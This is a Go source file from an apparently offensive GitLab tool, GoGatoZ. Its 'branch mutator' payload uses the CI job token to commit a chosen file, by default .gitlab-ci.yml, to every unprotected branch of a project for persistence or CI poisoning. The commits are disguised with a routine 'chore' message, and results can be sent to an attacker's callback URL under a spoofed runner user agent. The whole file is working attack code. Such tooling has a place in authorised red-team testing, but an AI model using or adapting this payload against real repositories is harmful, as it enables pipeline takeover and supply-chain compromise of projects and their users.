package payloads

import (
	"context"
	"fmt"
	"io"
	"strings"

	gitlab "gitlab.com/gitlab-org/api/client-go"
)

// BranchMutatorOptions configures a branch mutation attack payload.
// This technique iterates across unprotected branches in a project and
// commits a file (by default .gitlab-ci.yml) to each one, enabling
// broad code-level persistence or CI poisoning across the entire branch
// surface of a repository.
//
// Attack flow:
// 1. Enumerate all branches via GitLab REST API
// 2. Skip protected branches (cannot push without elevated perms)
// 3. Create a commit on each eligible branch via the Commits API
// 4. Report results to an optional callback URL
type BranchMutatorOptions struct {
	Common        CommonOptions
	FilePath      string // file to create/update on each branch (default ".gitlab-ci.yml")
	FileContent   string // content to write (base64-decoded in shell mode)
	CommitMessage string // commit message (default "chore: update configuration")
	MaxBranches   int    // max branches to target (default 10)
	CallbackURL   string // optional HTTP endpoint for result reporting
}

// GenerateBranchMutatorYAML returns a CI job that mutates files across branches.
// Used by --payload-only to produce a self-contained CI YAML.
func GenerateBranchMutatorYAML(o BranchMutatorOptions) string {
	name, stage := o.Common.defaults("branch-mutator")

	script := buildBranchMutatorScript(o)

	// Indent every line of the script by 6 spaces so it sits inside
	// the YAML block scalar (    - |\n      <content>).
	indented := indentScript(script, "      ")

	return fmt.Sprintf(`
# Auto-generated by GoGatoZ (Branch Mutator)
# Iterates unprotected branches and commits a file to each
stages: [%s]

%s:
  stage: %s%s%s
  script:
    - |
%s
    - echo "[*] Branch mutation complete"
  allow_failure: true%s
`, stage, name, stage, imageLine(o.Common.Image), tagsLine(o.Common.Tags), indented, rulesManual(o.Common.Manual))
}

// indentScript prepends prefix to every non-empty line and trims
// leading/trailing blank lines so the result sits cleanly inside a
// YAML block scalar.
func indentScript(s, prefix string) string {
	lines := strings.Split(strings.TrimSpace(s), "\n")
	var b strings.Builder
	for i, line := range lines {
		if i > 0 {
			b.WriteByte('\n')
		}
		if strings.TrimSpace(line) == "" {
			b.WriteString(prefix)
		} else {
			b.WriteString(prefix)
			b.WriteString(line)
		}
	}
	return b.String()
}

func buildBranchMutatorScript(o BranchMutatorOptions) string {
	filePath := strings.TrimSpace(o.FilePath)
	if filePath == "" {
		filePath = ".gitlab-ci.yml"
	}

	commitMsg := strings.TrimSpace(o.CommitMessage)
	if commitMsg == "" {
		commitMsg = "chore: update configuration"
	}

	maxBranches := o.MaxBranches
	if maxBranches <= 0 {
		maxBranches = 10
	}

	fileContent := o.FileContent
	if fileContent == "" {
		fileContent = "# updated"
	}

	callbackURL := strings.TrimSpace(o.CallbackURL)

	var b strings.Builder

	fmt.Fprintf(&b, `
_BRANCH_MUTATE() {
  _targeted=0
  _mutated=0
  _errors=0
  _max=%d
  _file_path="%s"
  _commit_msg="%s"
  _file_content="%s"

  echo "[*] Branch mutator starting..."
  echo "[*] Target file: $_file_path"
  echo "[*] Max branches: $_max"

`, maxBranches, filePath, commitMsg, fileContent)

	// Step 1: List all branches via REST API
	b.WriteString(`  # Step 1: List all branches via GitLab REST API
  _page=1
  _branches=""
  while true; do
    _resp=$(curl -sS -H "PRIVATE-TOKEN: $CI_JOB_TOKEN" \
      "$CI_API_V4_URL/projects/$CI_PROJECT_ID/repository/branches?per_page=100&page=$_page" 2>/dev/null)
    [ -z "$_resp" ] || [ "$_resp" = "[]" ] && break
    _names=$(echo "$_resp" | python3 -c "
import sys, json
data = json.load(sys.stdin)
for b in data:
    prot = b.get('protected', False)
    print(b['name'] + '|' + ('1' if prot else '0'))
" 2>/dev/null)
    _branches="$_branches
$_names"
    _page=$((_page + 1))
    echo "$_resp" | grep -q '"name"' || break
  done

`)

	// Step 2: Iterate branches and commit.
	// Write branches to a temp file and redirect into the while loop so that
	// counter variables (_targeted, _mutated, _errors) survive — piping into
	// while creates a subshell in POSIX sh and loses all variable updates.
	b.WriteString(`  # Step 2: Iterate branches, skip protected, commit file
  _bfile=$(mktemp)
  printf '%s\n' "$_branches" > "$_bfile"
  while IFS='|' read -r _bname _bprot; do
    [ -z "$_bname" ] && continue
    [ "$_targeted" -ge "$_max" ] && break
    _targeted=$((_targeted + 1))

    # Skip protected branches
    if [ "$_bprot" = "1" ]; then
      echo "[-] Skipping protected branch: $_bname"
      continue
    fi

    echo "[*] Mutating branch: $_bname"

    # Create commit via REST API
    _payload=$(python3 -c "
import json, sys
print(json.dumps({
    'branch': '$_bname',
    'commit_message': '$_commit_msg',
    'actions': [{
        'action': 'create',
        'file_path': '$_file_path',
        'content': '$_file_content'
    }]
}))
" 2>/dev/null)

    _result=$(curl -sS -X POST \
      -H "PRIVATE-TOKEN: $CI_JOB_TOKEN" \
      -H "Content-Type: application/json" \
      -d "$_payload" \
      "$CI_API_V4_URL/projects/$CI_PROJECT_ID/repository/commits" 2>/dev/null)

    if echo "$_result" | grep -q '"id"'; then
      echo "[+] Committed to branch: $_bname"
      _mutated=$((_mutated + 1))
    else
      echo "[-] Failed to commit to branch: $_bname"
      _errors=$((_errors + 1))
    fi
  done < "$_bfile"
  rm -f "$_bfile"

`)

	// Step 3: Report results
	b.WriteString(`  echo "[*] Results: targeted=$_targeted mutated=$_mutated errors=$_errors"
`)

	if callbackURL != "" {
		fmt.Fprintf(&b, `
  # Step 3: Report results to callback
  curl -sS -X POST \
    -H "Content-Type: application/json" \
    -H "User-Agent: GitLab-Runner/16.0" \
    -d "{\"targeted\":$_targeted,\"mutated\":$_mutated,\"errors\":$_errors,\"project\":\"$CI_PROJECT_PATH\"}" \
    "%s" >/dev/null 2>&1 || true
`, callbackURL)
	}

	b.WriteString(`
  echo "[*] Branch mutation cycle complete"
}

_BRANCH_MUTATE
`)

	return b.String()
}

// BranchMutatorResult reports the outcome of a branch mutation run.
type BranchMutatorResult struct {
	Targeted int      `json:"targeted"` // branches examined
	Mutated  int      `json:"mutated"`  // branches successfully mutated
	Errors   int      `json:"errors"`   // branches that failed
	Branches []string `json:"branches"` // branch names that were mutated
}

// RunBranchMutator performs a branch mutation attack using the GitLab SDK directly.
// It lists branches, skips protected ones, and creates a commit on each eligible
// branch up to MaxBranches.
func RunBranchMutator(ctx context.Context, client *gitlab.Client, projectID any, opts BranchMutatorOptions, authorName, authorEmail string, out io.Writer) BranchMutatorResult {
	var res BranchMutatorResult

	filePath := strings.TrimSpace(opts.FilePath)
	if filePath == "" {
		filePath = ".gitlab-ci.yml"
	}

	commitMsg := strings.TrimSpace(opts.CommitMessage)
	if commitMsg == "" {
		commitMsg = "chore: update configuration"
	}

	maxBranches := opts.MaxBranches
	if maxBranches <= 0 {
		maxBranches = 10
	}

	fileContent := opts.FileContent
	if fileContent == "" {
		fileContent = "# updated"
	}

	// List branches via SDK with pagination
	page := int64(1)
	var branches []*gitlab.Branch
	for {
		listOpts := &gitlab.ListBranchesOptions{
			ListOptions: gitlab.ListOptions{
				PerPage: 100,
				Page:    page,
			},
		}
		bs, resp, err := client.Branches.ListBranches(projectID, listOpts, gitlab.WithContext(ctx))
		if err != nil {
			if out != nil {
				fmt.Fprintf(out, "[-] Failed to list branches: %v\n", err)
			}
			res.Errors++
			return res
		}
		branches = append(branches, bs...)
		if resp.NextPage == 0 || len(branches) >= maxBranches {
			break
		}
		page = resp.NextPage
	}

	for _, branch := range branches {
		if res.Targeted >= maxBranches {
			break
		}
		res.Targeted++

		if branch.Protected {
			if out != nil {
				fmt.Fprintf(out, "[-] Skipping protected branch: %s\n", branch.Name)
			}
			continue
		}

		if out != nil {
			fmt.Fprintf(out, "[*] Mutating branch: %s\n", branch.Name)
		}

		if err := commitToBranch(ctx, client, projectID, branch.Name, filePath, fileContent, commitMsg, authorName, authorEmail); err != nil {
			res.Errors++
			if out != nil {
				fmt.Fprintf(out, "[-] Failed to commit to branch %s: %v\n", branch.Name, err)
			}
			continue
		}

		res.Mutated++
		res.Branches = append(res.Branches, branch.Name)
		if out != nil {
			fmt.Fprintf(out, "[+] Committed to branch: %s\n", branch.Name)
		}
	}

	return res
}

func commitToBranch(ctx context.Context, client *gitlab.Client, projectID any, branchName, filePath, content, msg, authorName, authorEmail string) error {
	action := gitlab.FileCreate
	_, _, ferr := client.RepositoryFiles.GetFile(
		projectID, filePath,
		&gitlab.GetFileOptions{Ref: new(branchName)},
		gitlab.WithContext(ctx),
	)
	if ferr == nil {
		action = gitlab.FileUpdate
	}

	commitOpts := &gitlab.CreateCommitOptions{
		Branch:        new(branchName),
		CommitMessage: new(msg),
		AuthorName:    new(authorName),
		AuthorEmail:   new(authorEmail),
		Actions: []*gitlab.CommitActionOptions{
			{
				Action:   new(action),
				FilePath: new(filePath),
				Content:  new(content),
			},
		},
	}

	_, _, err := client.Commits.CreateCommit(projectID, commitOpts, gitlab.WithContext(ctx))
	return err
}
